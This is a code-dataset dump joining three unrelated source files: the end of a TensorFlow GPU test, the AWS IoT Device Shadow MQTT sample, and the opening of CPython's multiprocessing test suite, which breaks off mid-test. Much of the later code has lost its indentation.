    # TODO(zhifengc/ke): make gradient checker work on GPU.

  @test_util.run_deprecated_v1
  def testGradient(self):
    x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
        [1, 3, 2])
    y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
        [1, 3, 2])
    self._compareGradientX(x, y, np.true_divide, math_ops.truediv)
    self._compareGradientY(x, y, np.true_divide, math_ops.truediv)
    self._compareGpu(x, y, np.true_divide, math_ops.truediv)
    self._compareGpu(x, y + 0.1, np.floor_divide, math_ops.floordiv)
class GpuMultiSessionMemoryTest(test_util.TensorFlowTestCase):
  """Tests concurrent sessions executing on the same GPU."""

  def _run_session(self, session, results):
    # Runs a small seeded graph repeatedly in *session*, adding each scalar
    # result to the *results* set; bails out early if the results diverge.
    n_iterations = 500
    with session as s:
      data = variables.Variable(1.0)
      with ops.device('/device:GPU:0'):
        random_seed.set_random_seed(1)
        matrix1 = variables.Variable(
            random_ops.truncated_normal([1024, 1]), name='matrix1')
        matrix2 = variables.Variable(
            random_ops.truncated_normal([1, 1024]), name='matrix2')
        x1 = math_ops.multiply(data, matrix1, name='x1')
        x3 = math_ops.matmul(x1, math_ops.matmul(matrix2, matrix1))
        x4 = math_ops.matmul(array_ops.transpose(x3), x3, name='x4')
        s.run(variables.global_variables_initializer())

        for _ in xrange(n_iterations):
          value = s.run(x4)
          results.add(value.flat[0])
          # A second distinct value means the deterministic graph produced
          # inconsistent results; no need to keep iterating.
          if len(results) != 1:
            break

  @test_util.run_v1_only('b/126596827 needs graph mode in multiple threads')
  def testConcurrentSessions(self):
    # Each thread runs the same seeded graph in its own session/graph; all
    # runs across all threads must yield one identical scalar.
    n_threads = 4
    threads = []
    results = []
    for _ in xrange(n_threads):
      session = self.session(graph=ops.Graph(), use_gpu=True)
      results.append(set())
      args = (session, results[-1])
      threads.append(threading.Thread(target=self._run_session, args=args))

    for thread in threads:
      thread.start()

    for thread in threads:
      thread.join()

    flat_results = set([x for x in itertools.chain(*results)])
    self.assertEqual(1,
                     len(flat_results),
                     'Expected single value, got %r' % flat_results)
# Run the test suite when executed directly.
if __name__ == '__main__':
  test.main()
|
shadow.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
# Command-line options for the sample.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
                                                      "Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
                                      "Necessary if MQTT server uses a certificate that's not already in " +
                                      "your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
                    help="To use a websocket instead of raw mqtt. If you " +
                         "specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
                    "is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
                    help='Logging level')

# Using globals to simplify sample code
is_sample_done = threading.Event()  # set once the MQTT disconnect completes
mqtt_connection = None  # assigned after connecting (not shown in this chunk)
shadow_client = None  # assigned after connecting (not shown in this chunk)
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"  # reported value used when the shadow lacks one
class LockedData:
    """Mutable sample state shared across MQTT callbacks, guarded by an
    explicit lock."""

    def __init__(self):
        self.lock = threading.Lock()    # guards every field below
        self.shadow_value = None        # last known value of the shadow property
        self.disconnect_called = False  # ensures we only disconnect once
        self.request_tokens = set()     # client tokens of in-flight requests
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
with locked_data.lock:
# check that this is a response to a request from this session
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring get_shadow_accepted message due to unexpected token.")
return
print("Finished getting initial shadow state.")
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring get_shadow_rejected message due to unexpected token.")
return
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring update_shadow_accepted message due to unexpected token.")
return
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
except Exception as e:
exit(e)
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring update_shadow_rejected message due to unexpected token.")
return
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
),
client_token=token,
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
while True:
try:
# Read user input
new_value = input()
# If user wants to quit sample, then quit.
# Otherwise change the shadow value.
if new_value in ['exit', 'quit']:
exit("User has quit")
break
else:
change_shadow_value(new_value)
except Exception as e:
print("Exception on input thread.")
exit(e)
break
if __name__ == '__main__':
# Process input args
args = parser.parse_args()
thing_name = args.thing_name
shadow_property = args.shadow_property
io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
proxy_options = None
if (args.proxy_host):
proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
if args.use_websocket == True:
credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
endpoint=args.endpoint,
client_bootstrap=client_bootstrap,
region=args.signing_region,
credentials_provider=credentials_provider,
http_proxy_options=proxy_options,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=6)
else:
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=args.endpoint,
cert_filepath=args.cert,
pri_key_filepath=args.key,
client_bootstrap=client_bootstrap,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=6,
http_proxy_options=proxy_options)
print("Connecting to {} with client ID '{}'...".format(
args.endpoint, args.client_id))
connected_future = mqtt_connection.connect()
shadow_client = iotshadow.IotShadowClient(mqtt_connection)
# Wait for connection to be fully established.
# Note that it's not necessary to wait, commands issued to the
# mqtt_connection before its fully connected will simply be queued.
# But this sample waits here so it's obvious when a connection
# fails or succeeds.
connected_future.result()
print("Connected!")
try:
# Subscribe to necessary topics.
# Note that is **is** important to wait for "accepted/rejected" subscriptions
# to succeed before publishing the corresponding "request".
print("Subscribing to Update responses...")
update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_accepted)
update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_rejected)
# Wait for subscriptions to succeed
update_accepted_subscribed_future.result()
update_rejected_subscribed_future.result()
print("Subscribing to Get responses...")
get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_accepted)
get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_rejected)
# Wait for subscriptions to succeed
get_accepted_subscribed_future.result()
get_rejected_subscribed_future.result()
print("Subscribing to Delta events...")
delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_shadow_delta_updated)
# Wait for subscription to succeed
delta_subscribed_future.result()
# The rest of the sample runs asynchronously.
# Issue request for shadow's current state.
# The response will be received by the on_get_accepted() callback
print("Requesting current shadow state...")
with locked_data.lock:
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
publish_get_future = shadow_client.publish_get_shadow(
request=iotshadow.GetShadowRequest(thing_name=args.thing_name, client_token=token),
qos=mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
# Ensure that publish succeeds
publish_get_future.result()
# Launch thread to handle user input.
# A "daemon" thread won't prevent the program from shutting down.
print("Launching thread to read user input...")
user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
user_input_thread.daemon = True
user_input_thread.start()
except Exception as e:
exit(e)
# Wait for the sample to finish (user types 'quit', or an error occurs)
is_sample_done.wait()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
